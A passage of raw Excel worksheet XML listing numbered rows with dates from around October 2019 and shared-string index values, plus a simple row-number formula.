        <v>19637</v>
      </c>
      <c r="D14556" s="1">
        <v>43757</v>
      </c>
      <c r="E14556" t="s">
        <v>23181</v>
      </c>
      <c r="F14556" t="s">
        <v>10021</v>
      </c>
      <c r="G14556" t="s">
        <v>25014</v>
      </c>
    </row>
    <row r="14557" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14557">
        <f t="shared" si="227"/>
        <v>14556</v>
      </c>
      <c r="B14557">
        <v>4556</v>
      </c>
      <c r="C14557" t="s">
        <v>19637</v>
      </c>
      <c r="D14557" s="1">
        <v>43744</v>
      </c>
      <c r="E14557" t="s">
        <v>19690</v>
      </c>
      <c r="F14557" t="s">
        <v>9978</v>
      </c>
      <c r="G14557" t="s">
        <v>25015</v>
      </c>
    </row>
    <row r="14558" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14558">
        <f t="shared" si="227"/>
        <v>14557</v>
      </c>
      <c r="B14558">
        <v>4557</v>
      </c>
      <c r="C14558" t="s">
        <v>19637</v>
      </c>
      <c r="D14558" s="1">
        <v>43749</v>
      </c>
      <c r="E14558" t="s">
        <v>19680</v>
      </c>
      <c r="F14558" t="s">
        <v>10021</v>
      </c>
      <c r="G14558" t="s">
        <v>25016</v>
      </c>
    </row>
    <row r="14559" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14559">
        <f t="shared" si="227"/>
        <v>14558</v>
      </c>
      <c r="B14559">
        <v>4558</v>
      </c>
      <c r="C14559" t="s">
        <v>19637</v>
      </c>
      <c r="D14559" s="1">
        <v>43740</v>
      </c>
      <c r="E14559" t="s">
        <v>19640</v>
      </c>
      <c r="F14559" t="s">
        <v>10021</v>
      </c>
      <c r="G14559" t="s">
        <v>25017</v>
      </c>
    </row>
    <row r="14560" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14560">
        <f t="shared" si="227"/>
        <v>14559</v>
      </c>
      <c r="B14560">
        <v>4559</v>
      </c>
      <c r="C14560" t="s">
        <v>19637</v>
      </c>
      <c r="D14560" s="1">
        <v>43757</v>
      </c>
      <c r="E14560" t="s">
        <v>19640</v>
      </c>
      <c r="F14560" t="s">
        <v>10021</v>
      </c>
      <c r="G14560" t="s">
        <v>25018</v>
      </c>
    </row>
    <row r="14561" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14561">
        <f t="shared" si="227"/>
        <v>14560</v>
      </c>
      <c r="B14561">
        <v>4560</v>
      </c>
      <c r="C14561" t="s">
        <v>19637</v>
      </c>
      <c r="D14561" s="1">
        <v>43746</v>
      </c>
      <c r="F14561" t="s">
        <v>10526</v>
      </c>
      <c r="G14561" t="s">
        <v>25019</v>
      </c>
    </row>
    <row r="14562" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14562">
        <f t="shared" si="227"/>
        <v>14561</v>
      </c>
      <c r="B14562">
        <v>4561</v>
      </c>
      <c r="C14562" t="s">
        <v>19637</v>
      </c>
      <c r="D14562" s="1">
        <v>43749</v>
      </c>
      <c r="F14562" t="s">
        <v>10021</v>
      </c>
      <c r="G14562" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14563" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14563">
        <f t="shared" si="227"/>
        <v>14562</v>
      </c>
      <c r="B14563">
        <v>4562</v>
      </c>
      <c r="C14563" t="s">
        <v>19637</v>
      </c>
      <c r="D14563" s="1">
        <v>43757</v>
      </c>
      <c r="E14563" t="s">
        <v>20182</v>
      </c>
      <c r="F14563" t="s">
        <v>10021</v>
      </c>
      <c r="G14563" t="s">
        <v>25020</v>
      </c>
    </row>
    <row r="14564" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14564">
        <f t="shared" si="227"/>
        <v>14563</v>
      </c>
      <c r="B14564">
        <v>4563</v>
      </c>
      <c r="C14564" t="s">
        <v>19637</v>
      </c>
      <c r="D14564" s="1">
        <v>43756</v>
      </c>
      <c r="E14564" t="s">
        <v>19715</v>
      </c>
      <c r="F14564" t="s">
        <v>10021</v>
      </c>
      <c r="G14564" t="s">
        <v>25021</v>
      </c>
    </row>
    <row r="14565" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14565">
        <f t="shared" si="227"/>
        <v>14564</v>
      </c>
      <c r="B14565">
        <v>4564</v>
      </c>
      <c r="C14565" t="s">
        <v>19637</v>
      </c>
      <c r="D14565" s="1">
        <v>43745</v>
      </c>
      <c r="E14565" t="s">
        <v>19896</v>
      </c>
      <c r="F14565" t="s">
        <v>10021</v>
      </c>
      <c r="G14565" t="s">
        <v>25022</v>
      </c>
    </row>
    <row r="14566" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14566">
        <f t="shared" si="227"/>
        <v>14565</v>
      </c>
      <c r="B14566">
        <v>4565</v>
      </c>
      <c r="C14566" t="s">
        <v>19637</v>
      </c>
      <c r="D14566" s="1">
        <v>43745</v>
      </c>
      <c r="F14566" t="s">
        <v>9978</v>
      </c>
      <c r="G14566" t="s">
        <v>25023</v>
      </c>
    </row>
    <row r="14567" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14567">
        <f t="shared" si="227"/>
        <v>14566</v>
      </c>
      <c r="B14567">
        <v>4566</v>
      </c>
      <c r="C14567" t="s">
        <v>19637</v>
      </c>
      <c r="D14567" s="1">
        <v>43748</v>
      </c>
      <c r="E14567" t="s">
        <v>19672</v>
      </c>
      <c r="F14567" t="s">
        <v>10021</v>
      </c>
      <c r="G14567" t="s">
        <v>25024</v>
      </c>
    </row>
    <row r="14568" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14568">
        <f t="shared" si="227"/>
        <v>14567</v>
      </c>
      <c r="B14568">
        <v>4567</v>
      </c>
      <c r="C14568" t="s">
        <v>19637</v>
      </c>
      <c r="D14568" s="1">
        <v>43744</v>
      </c>
      <c r="E14568" t="s">
        <v>19860</v>
      </c>
      <c r="F14568" t="s">
        <v>10526</v>
      </c>
      <c r="G14568" t="s">
        <v>25025</v>
      </c>
    </row>
    <row r="14569" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14569">
        <f t="shared" si="227"/>
        <v>14568</v>
      </c>
      <c r="B14569">
        <v>4568</v>
      </c>
      <c r="C14569" t="s">
        <v>19637</v>
      </c>
      <c r="D14569" s="1">
        <v>43741</v>
      </c>
      <c r="E14569" t="s">
        <v>19640</v>
      </c>
      <c r="F14569" t="s">
        <v>9975</v>
      </c>
      <c r="G14569" t="s">
        <v>25026</v>
      </c>
    </row>
    <row r="14570" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14570">
        <f t="shared" si="227"/>
        <v>14569</v>
      </c>
      <c r="B14570">
        <v>4569</v>
      </c>
      <c r="C14570" t="s">
        <v>19637</v>
      </c>
      <c r="D14570" s="1">
        <v>43743</v>
      </c>
      <c r="E14570" t="s">
        <v>19873</v>
      </c>
      <c r="F14570" t="s">
        <v>10526</v>
      </c>
      <c r="G14570" t="s">
        <v>25027</v>
      </c>
    </row>
    <row r="14571" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14571">
        <f t="shared" si="227"/>
        <v>14570</v>
      </c>
      <c r="B14571">
        <v>4570</v>
      </c>
      <c r="C14571" t="s">
        <v>19637</v>
      </c>
      <c r="D14571" s="1">
        <v>43746</v>
      </c>
      <c r="E14571" t="s">
        <v>19640</v>
      </c>
      <c r="F14571" t="s">
        <v>9975</v>
      </c>
      <c r="G14571" t="s">
        <v>25028</v>
      </c>
    </row>
    <row r="14572" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14572">
        <f t="shared" si="227"/>
        <v>14571</v>
      </c>
      <c r="B14572">
        <v>4571</v>
      </c>
      <c r="C14572" t="s">
        <v>19637</v>
      </c>
      <c r="D14572" s="1">
        <v>43740</v>
      </c>
      <c r="F14572" t="s">
        <v>10526</v>
      </c>
      <c r="G14572" t="s">
        <v>25029</v>
      </c>
    </row>
    <row r="14573" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14573">
        <f t="shared" si="227"/>
        <v>14572</v>
      </c>
      <c r="B14573">
        <v>4572</v>
      </c>
      <c r="C14573" t="s">
        <v>19637</v>
      </c>
      <c r="D14573" s="1">
        <v>43738</v>
      </c>
      <c r="E14573" t="s">
        <v>19640</v>
      </c>
      <c r="F14573" t="s">
        <v>9975</v>
      </c>
      <c r="G14573" t="s">
        <v>25030</v>
      </c>
    </row>
    <row r="14574" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14574">
        <f t="shared" si="227"/>
        <v>14573</v>
      </c>
      <c r="B14574">
        <v>4573</v>
      </c>
      <c r="C14574" t="s">
        <v>19637</v>
      </c>
      <c r="D14574" s="1">
        <v>43746</v>
      </c>
      <c r="E14574" t="s">
        <v>19640</v>
      </c>
      <c r="F14574" t="s">
        <v>9975</v>
      </c>
      <c r="G14574" t="s">
        <v>25031</v>
      </c>
    </row>
    <row r="14575" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14575">
        <f t="shared" si="227"/>
        <v>14574</v>
      </c>
      <c r="B14575">
        <v>4574</v>
      </c>
      <c r="C14575" t="s">
        <v>19637</v>
      </c>
      <c r="D14575" s="1">
        <v>43750</v>
      </c>
      <c r="F14575" t="s">
        <v>10526</v>
      </c>
      <c r="G14575" t="s">
        <v>25032</v>
      </c>
    </row>
    <row r="14576" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14576">
        <f t="shared" si="227"/>
        <v>14575</v>
      </c>
      <c r="B14576">
        <v>4575</v>
      </c>
      <c r="C14576" t="s">
        <v>19637</v>
      </c>
      <c r="D14576" s="1">
        <v>43749</v>
      </c>
      <c r="E14576" t="s">
        <v>19640</v>
      </c>
      <c r="F14576" t="s">
        <v>9975</v>
      </c>
      <c r="G14576" t="s">
        <v>25033</v>
      </c>
    </row>
    <row r="14577" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14577">
        <f t="shared" si="227"/>
        <v>14576</v>
      </c>
      <c r="B14577">
        <v>4576</v>
      </c>
      <c r="C14577" t="s">
        <v>19637</v>
      </c>
      <c r="D14577" s="1">
        <v>43756</v>
      </c>
      <c r="E14577" t="s">
        <v>19640</v>
      </c>
      <c r="F14577" t="s">
        <v>10021</v>
      </c>
      <c r="G14577" t="s">
        <v>25034</v>
      </c>
    </row>
    <row r="14578" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14578">
        <f t="shared" si="227"/>
        <v>14577</v>
      </c>
      <c r="B14578">
        <v>4577</v>
      </c>
      <c r="C14578" t="s">
        <v>19637</v>
      </c>
      <c r="D14578" s="1">
        <v>43747</v>
      </c>
      <c r="E14578" t="s">
        <v>19672</v>
      </c>
      <c r="F14578" t="s">
        <v>10021</v>
      </c>
      <c r="G14578" t="s">
        <v>25035</v>
      </c>
    </row>
    <row r="14579" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14579">
        <f t="shared" si="227"/>
        <v>14578</v>
      </c>
      <c r="B14579">
        <v>4578</v>
      </c>
      <c r="C14579" t="s">
        <v>19637</v>
      </c>
      <c r="D14579" s="1">
        <v>43742</v>
      </c>
      <c r="E14579" t="s">
        <v>19917</v>
      </c>
      <c r="F14579" t="s">
        <v>9975</v>
      </c>
      <c r="G14579" t="s">
        <v>25036</v>
      </c>
    </row>
    <row r="14580" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14580">
        <f t="shared" si="227"/>
        <v>14579</v>
      </c>
      <c r="B14580">
        <v>4579</v>
      </c>
      <c r="C14580" t="s">
        <v>19637</v>
      </c>
      <c r="D14580" s="1">
        <v>43754</v>
      </c>
      <c r="E14580" t="s">
        <v>20694</v>
      </c>
      <c r="F14580" t="s">
        <v>10526</v>
      </c>
      <c r="G14580" t="s">
        <v>25037</v>
      </c>
    </row>
    <row r="14581" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14581">
        <f t="shared" si="227"/>
        <v>14580</v>
      </c>
      <c r="B14581">
        <v>4580</v>
      </c>
      <c r="C14581" t="s">
        <v>19637</v>
      </c>
      <c r="D14581" s="1">
        <v>43744</v>
      </c>
      <c r="F14581" t="s">
        <v>10526</v>
      </c>
      <c r="G14581" t="s">
        <v>25038</v>
      </c>
    </row>
    <row r="14582" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14582">
        <f t="shared" si="227"/>
        <v>14581</v>
      </c>
      <c r="B14582">
        <v>4581</v>
      </c>
      <c r="C14582" t="s">
        <v>19637</v>
      </c>
      <c r="D14582" s="1">
        <v>43738</v>
      </c>
      <c r="E14582" t="s">
        <v>20704</v>
      </c>
      <c r="F14582" t="s">
        <v>10526</v>
      </c>
      <c r="G14582" t="s">
        <v>25039</v>
      </c>
    </row>
    <row r="14583" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14583">
        <f t="shared" si="227"/>
        <v>14582</v>
      </c>
      <c r="B14583">
        <v>4582</v>
      </c>
      <c r="C14583" t="s">
        <v>19637</v>
      </c>
      <c r="D14583" s="1">
        <v>43748</v>
      </c>
      <c r="E14583" t="s">
        <v>25040</v>
      </c>
      <c r="F14583" t="s">
        <v>9978</v>
      </c>
      <c r="G14583" t="s">
        <v>25041</v>
      </c>
    </row>
    <row r="14584" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14584">
        <f t="shared" si="227"/>
        <v>14583</v>
      </c>
      <c r="B14584">
        <v>4583</v>
      </c>
      <c r="C14584" t="s">
        <v>19637</v>
      </c>
      <c r="D14584" s="1">
        <v>43740</v>
      </c>
      <c r="E14584" t="s">
        <v>25042</v>
      </c>
      <c r="F14584" t="s">
        <v>10526</v>
      </c>
      <c r="G14584" t="s">
        <v>25043</v>
      </c>
    </row>
    <row r="14585" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14585">
        <f t="shared" si="227"/>
        <v>14584</v>
      </c>
      <c r="B14585">
        <v>4584</v>
      </c>
      <c r="C14585" t="s">
        <v>19637</v>
      </c>
      <c r="D14585" s="1">
        <v>43752</v>
      </c>
      <c r="E14585" t="s">
        <v>19896</v>
      </c>
      <c r="F14585" t="s">
        <v>10021</v>
      </c>
      <c r="G14585" t="s">
        <v>25044</v>
      </c>
    </row>
    <row r="14586" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14586">
        <f t="shared" si="227"/>
        <v>14585</v>
      </c>
      <c r="B14586">
        <v>4585</v>
      </c>
      <c r="C14586" t="s">
        <v>19637</v>
      </c>
      <c r="D14586" s="1">
        <v>43754</v>
      </c>
      <c r="E14586" t="s">
        <v>25045</v>
      </c>
      <c r="F14586" t="s">
        <v>10021</v>
      </c>
      <c r="G14586" t="s">
        <v>25046</v>
      </c>
    </row>
    <row r="14587" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14587">
        <f t="shared" si="227"/>
        <v>14586</v>
      </c>
      <c r="B14587">
        <v>4586</v>
      </c>
      <c r="C14587" t="s">
        <v>19637</v>
      </c>
      <c r="D14587" s="1">
        <v>43740</v>
      </c>
      <c r="E14587" t="s">
        <v>21124</v>
      </c>
      <c r="F14587" t="s">
        <v>10526</v>
      </c>
      <c r="G14587" t="s">
        <v>25047</v>
      </c>
    </row>
    <row r="14588" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14588">
        <f t="shared" si="227"/>
        <v>14587</v>
      </c>
      <c r="B14588">
        <v>4587</v>
      </c>
      <c r="C14588" t="s">
        <v>19637</v>
      </c>
      <c r="D14588" s="1">
        <v>43743</v>
      </c>
      <c r="E14588" t="s">
        <v>19638</v>
      </c>
      <c r="F14588" t="s">
        <v>10021</v>
      </c>
      <c r="G14588" t="s">
        <v>25048</v>
      </c>
    </row>
    <row r="14589" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14589">
        <f t="shared" si="227"/>
        <v>14588</v>
      </c>
      <c r="B14589">
        <v>4588</v>
      </c>
      <c r="C14589" t="s">
        <v>19637</v>
      </c>
      <c r="D14589" s="1">
        <v>43740</v>
      </c>
      <c r="E14589" t="s">
        <v>19638</v>
      </c>
      <c r="F14589" t="s">
        <v>10021</v>
      </c>
      <c r="G14589" t="s">
        <v>25049</v>
      </c>
    </row>
    <row r="14590" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14590">
        <f t="shared" si="227"/>
        <v>14589</v>
      </c>
      <c r="B14590">
        <v>4589</v>
      </c>
      <c r="C14590" t="s">
        <v>19637</v>
      </c>
      <c r="D14590" s="1">
        <v>43753</v>
      </c>
      <c r="E14590" t="s">
        <v>19849</v>
      </c>
      <c r="F14590" t="s">
        <v>10021</v>
      </c>
      <c r="G14590" t="s">
        <v>25050</v>
      </c>
    </row>
    <row r="14591" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14591">
        <f t="shared" si="227"/>
        <v>14590</v>
      </c>
      <c r="B14591">
        <v>4590</v>
      </c>
      <c r="C14591" t="s">
        <v>19637</v>
      </c>
      <c r="D14591" s="1">
        <v>43742</v>
      </c>
      <c r="E14591" t="s">
        <v>19640</v>
      </c>
      <c r="F14591" t="s">
        <v>10021</v>
      </c>
      <c r="G14591" t="s">
        <v>25051</v>
      </c>
    </row>
    <row r="14592" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14592">
        <f t="shared" si="227"/>
        <v>14591</v>
      </c>
      <c r="B14592">
        <v>4591</v>
      </c>
      <c r="C14592" t="s">
        <v>19637</v>
      </c>
      <c r="D14592" s="1">
        <v>43748</v>
      </c>
      <c r="E14592" t="s">
        <v>19640</v>
      </c>
      <c r="F14592" t="s">
        <v>9975</v>
      </c>
      <c r="G14592" t="s">
        <v>24922</v>
      </c>
    </row>
    <row r="14593" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14593">
        <f t="shared" si="227"/>
        <v>14592</v>
      </c>
      <c r="B14593">
        <v>4592</v>
      </c>
      <c r="C14593" t="s">
        <v>19637</v>
      </c>
      <c r="D14593" s="1">
        <v>43745</v>
      </c>
      <c r="E14593" t="s">
        <v>19650</v>
      </c>
      <c r="F14593" t="s">
        <v>10021</v>
      </c>
      <c r="G14593" t="s">
        <v>25052</v>
      </c>
    </row>
    <row r="14594" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14594">
        <f t="shared" si="227"/>
        <v>14593</v>
      </c>
      <c r="B14594">
        <v>4593</v>
      </c>
      <c r="C14594" t="s">
        <v>19637</v>
      </c>
      <c r="D14594" s="1">
        <v>43749</v>
      </c>
      <c r="F14594" t="s">
        <v>10021</v>
      </c>
      <c r="G14594" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14595" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14595">
        <f t="shared" ref="A14595:A14658" si="228">+ROW(A14594)</f>
        <v>14594</v>
      </c>
      <c r="B14595">
        <v>4594</v>
      </c>
      <c r="C14595" t="s">
        <v>19637</v>
      </c>
      <c r="D14595" s="1">
        <v>43757</v>
      </c>
      <c r="F14595" t="s">
        <v>10526</v>
      </c>
      <c r="G14595" t="s">
        <v>25053</v>
      </c>
    </row>
    <row r="14596" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14596">
        <f t="shared" si="228"/>
        <v>14595</v>
      </c>
      <c r="B14596">
        <v>4595</v>
      </c>
      <c r="C14596" t="s">
        <v>19637</v>
      </c>
      <c r="D14596" s="1">
        <v>43742</v>
      </c>
      <c r="E14596" t="s">
        <v>19640</v>
      </c>
      <c r="F14596" t="s">
        <v>9975</v>
      </c>
      <c r="G14596" t="s">
        <v>25054</v>
      </c>
    </row>
    <row r="14597" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14597">
        <f t="shared" si="228"/>
        <v>14596</v>
      </c>
      <c r="B14597">
        <v>4596</v>
      </c>
      <c r="C14597" t="s">
        <v>19637</v>
      </c>
      <c r="D14597" s="1">
        <v>43750</v>
      </c>
      <c r="E14597" t="s">
        <v>20063</v>
      </c>
      <c r="F14597" t="s">
        <v>10526</v>
      </c>
      <c r="G14597" t="s">
        <v>25055</v>
      </c>
    </row>
    <row r="14598" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14598">
        <f t="shared" si="228"/>
        <v>14597</v>
      </c>
      <c r="B14598">
        <v>4597</v>
      </c>
      <c r="C14598" t="s">
        <v>19637</v>
      </c>
      <c r="D14598" s="1">
        <v>43753</v>
      </c>
      <c r="E14598" t="s">
        <v>19640</v>
      </c>
      <c r="F14598" t="s">
        <v>9975</v>
      </c>
      <c r="G14598" t="s">
        <v>25056</v>
      </c>
    </row>
    <row r="14599" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14599">
        <f t="shared" si="228"/>
        <v>14598</v>
      </c>
      <c r="B14599">
        <v>4598</v>
      </c>
      <c r="C14599" t="s">
        <v>19637</v>
      </c>
      <c r="D14599" s="1">
        <v>43739</v>
      </c>
      <c r="E14599" t="s">
        <v>25057</v>
      </c>
      <c r="F14599" t="s">
        <v>10526</v>
      </c>
      <c r="G14599" t="s">
        <v>25058</v>
      </c>
    </row>
    <row r="14600" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14600">
        <f t="shared" si="228"/>
        <v>14599</v>
      </c>
      <c r="B14600">
        <v>4599</v>
      </c>
      <c r="C14600" t="s">
        <v>19637</v>
      </c>
      <c r="D14600" s="1">
        <v>43749</v>
      </c>
      <c r="F14600" t="s">
        <v>10526</v>
      </c>
      <c r="G14600" t="s">
        <v>25059</v>
      </c>
    </row>
    <row r="14601" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14601">
        <f t="shared" si="228"/>
        <v>14600</v>
      </c>
      <c r="B14601">
        <v>4600</v>
      </c>
      <c r="C14601" t="s">
        <v>19637</v>
      </c>
      <c r="D14601" s="1">
        <v>43755</v>
      </c>
      <c r="E14601" t="s">
        <v>21318</v>
      </c>
      <c r="F14601" t="s">
        <v>10526</v>
      </c>
      <c r="G14601" t="s">
        <v>25060</v>
      </c>
    </row>
    <row r="14602" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14602">
        <f t="shared" si="228"/>
        <v>14601</v>
      </c>
      <c r="B14602">
        <v>4601</v>
      </c>
      <c r="C14602" t="s">
        <v>19637</v>
      </c>
      <c r="D14602" s="1">
        <v>43743</v>
      </c>
      <c r="E14602" t="s">
        <v>24195</v>
      </c>
      <c r="F14602" t="s">
        <v>10526</v>
      </c>
      <c r="G14602" t="s">
        <v>25061</v>
      </c>
    </row>
    <row r="14603" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14603">
        <f t="shared" si="228"/>
        <v>14602</v>
      </c>
      <c r="B14603">
        <v>4602</v>
      </c>
      <c r="C14603" t="s">
        <v>19637</v>
      </c>
      <c r="D14603" s="1">
        <v>43741</v>
      </c>
      <c r="E14603" t="s">
        <v>19860</v>
      </c>
      <c r="F14603" t="s">
        <v>10526</v>
      </c>
      <c r="G14603" t="s">
        <v>25062</v>
      </c>
    </row>
    <row r="14604" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14604">
        <f t="shared" si="228"/>
        <v>14603</v>
      </c>
      <c r="B14604">
        <v>4603</v>
      </c>
      <c r="C14604" t="s">
        <v>19637</v>
      </c>
      <c r="D14604" s="1">
        <v>43746</v>
      </c>
      <c r="E14604" t="s">
        <v>25063</v>
      </c>
      <c r="F14604" t="s">
        <v>10021</v>
      </c>
      <c r="G14604" t="s">
        <v>25064</v>
      </c>
    </row>
    <row r="14605" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14605">
        <f t="shared" si="228"/>
        <v>14604</v>
      </c>
      <c r="B14605">
        <v>4604</v>
      </c>
      <c r="C14605" t="s">
        <v>19637</v>
      </c>
      <c r="D14605" s="1">
        <v>43756</v>
      </c>
      <c r="E14605" t="s">
        <v>19672</v>
      </c>
      <c r="F14605" t="s">
        <v>10021</v>
      </c>
      <c r="G14605" t="s">
        <v>25065</v>
      </c>
    </row>
    <row r="14606" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14606">
        <f t="shared" si="228"/>
        <v>14605</v>
      </c>
      <c r="B14606">
        <v>4605</v>
      </c>
      <c r="C14606" t="s">
        <v>19637</v>
      </c>
      <c r="D14606" s="1">
        <v>43750</v>
      </c>
      <c r="E14606" t="s">
        <v>19690</v>
      </c>
      <c r="F14606" t="s">
        <v>9978</v>
      </c>
      <c r="G14606" t="s">
        <v>25066</v>
      </c>
    </row>
    <row r="14607" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14607">
        <f t="shared" si="228"/>
        <v>14606</v>
      </c>
      <c r="B14607">
        <v>4606</v>
      </c>
      <c r="C14607" t="s">
        <v>19637</v>
      </c>
      <c r="D14607" s="1">
        <v>43755</v>
      </c>
      <c r="E14607" t="s">
        <v>19640</v>
      </c>
      <c r="F14607" t="s">
        <v>10021</v>
      </c>
      <c r="G14607" t="s">
        <v>25067</v>
      </c>
    </row>
    <row r="14608" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14608">
        <f t="shared" si="228"/>
        <v>14607</v>
      </c>
      <c r="B14608">
        <v>4607</v>
      </c>
      <c r="C14608" t="s">
        <v>19637</v>
      </c>
      <c r="D14608" s="1">
        <v>43742</v>
      </c>
      <c r="E14608" t="s">
        <v>19640</v>
      </c>
      <c r="F14608" t="s">
        <v>10021</v>
      </c>
      <c r="G14608" t="s">
        <v>25068</v>
      </c>
    </row>
    <row r="14609" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14609">
        <f t="shared" si="228"/>
        <v>14608</v>
      </c>
      <c r="B14609">
        <v>4608</v>
      </c>
      <c r="C14609" t="s">
        <v>19637</v>
      </c>
      <c r="D14609" s="1">
        <v>43751</v>
      </c>
      <c r="F14609" t="s">
        <v>10526</v>
      </c>
      <c r="G14609" t="s">
        <v>25069</v>
      </c>
    </row>
    <row r="14610" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14610">
        <f t="shared" si="228"/>
        <v>14609</v>
      </c>
      <c r="B14610">
        <v>4609</v>
      </c>
      <c r="C14610" t="s">
        <v>19637</v>
      </c>
      <c r="D14610" s="1">
        <v>43757</v>
      </c>
      <c r="E14610" t="s">
        <v>19663</v>
      </c>
      <c r="F14610" t="s">
        <v>9975</v>
      </c>
      <c r="G14610" t="s">
        <v>25070</v>
      </c>
    </row>
    <row r="14611" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14611">
        <f t="shared" si="228"/>
        <v>14610</v>
      </c>
      <c r="B14611">
        <v>4610</v>
      </c>
      <c r="C14611" t="s">
        <v>19637</v>
      </c>
      <c r="D14611" s="1">
        <v>43739</v>
      </c>
      <c r="E14611" t="s">
        <v>21172</v>
      </c>
      <c r="F14611" t="s">
        <v>10526</v>
      </c>
      <c r="G14611" t="s">
        <v>25071</v>
      </c>
    </row>
    <row r="14612" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14612">
        <f t="shared" si="228"/>
        <v>14611</v>
      </c>
      <c r="B14612">
        <v>4611</v>
      </c>
      <c r="C14612" t="s">
        <v>19637</v>
      </c>
      <c r="D14612" s="1">
        <v>43743</v>
      </c>
      <c r="E14612" t="s">
        <v>21785</v>
      </c>
      <c r="F14612" t="s">
        <v>10021</v>
      </c>
      <c r="G14612" t="s">
        <v>25072</v>
      </c>
    </row>
    <row r="14613" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14613">
        <f t="shared" si="228"/>
        <v>14612</v>
      </c>
      <c r="B14613">
        <v>4612</v>
      </c>
      <c r="C14613" t="s">
        <v>19637</v>
      </c>
      <c r="D14613" s="1">
        <v>43740</v>
      </c>
      <c r="E14613" t="s">
        <v>25073</v>
      </c>
      <c r="F14613" t="s">
        <v>10021</v>
      </c>
      <c r="G14613" t="s">
        <v>25074</v>
      </c>
    </row>
    <row r="14614" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14614">
        <f t="shared" si="228"/>
        <v>14613</v>
      </c>
      <c r="B14614">
        <v>4613</v>
      </c>
      <c r="C14614" t="s">
        <v>19637</v>
      </c>
      <c r="D14614" s="1">
        <v>43744</v>
      </c>
      <c r="E14614" t="s">
        <v>19643</v>
      </c>
      <c r="F14614" t="s">
        <v>10021</v>
      </c>
      <c r="G14614" t="s">
        <v>25075</v>
      </c>
    </row>
    <row r="14615" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14615">
        <f t="shared" si="228"/>
        <v>14614</v>
      </c>
      <c r="B14615">
        <v>4614</v>
      </c>
      <c r="C14615" t="s">
        <v>19637</v>
      </c>
      <c r="D14615" s="1">
        <v>43739</v>
      </c>
      <c r="F14615" t="s">
        <v>10526</v>
      </c>
      <c r="G14615" t="s">
        <v>25076</v>
      </c>
    </row>
    <row r="14616" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14616">
        <f t="shared" si="228"/>
        <v>14615</v>
      </c>
      <c r="B14616">
        <v>4615</v>
      </c>
      <c r="C14616" t="s">
        <v>19637</v>
      </c>
      <c r="D14616" s="1">
        <v>43752</v>
      </c>
      <c r="E14616" t="s">
        <v>25077</v>
      </c>
      <c r="F14616" t="s">
        <v>10526</v>
      </c>
      <c r="G14616" t="s">
        <v>25078</v>
      </c>
    </row>
    <row r="14617" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14617">
        <f t="shared" si="228"/>
        <v>14616</v>
      </c>
      <c r="B14617">
        <v>4616</v>
      </c>
      <c r="C14617" t="s">
        <v>19637</v>
      </c>
      <c r="D14617" s="1">
        <v>43739</v>
      </c>
      <c r="E14617" t="s">
        <v>19840</v>
      </c>
      <c r="F14617" t="s">
        <v>10021</v>
      </c>
      <c r="G14617" t="s">
        <v>25079</v>
      </c>
    </row>
    <row r="14618" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14618">
        <f t="shared" si="228"/>
        <v>14617</v>
      </c>
      <c r="B14618">
        <v>4617</v>
      </c>
      <c r="C14618" t="s">
        <v>19637</v>
      </c>
      <c r="D14618" s="1">
        <v>43753</v>
      </c>
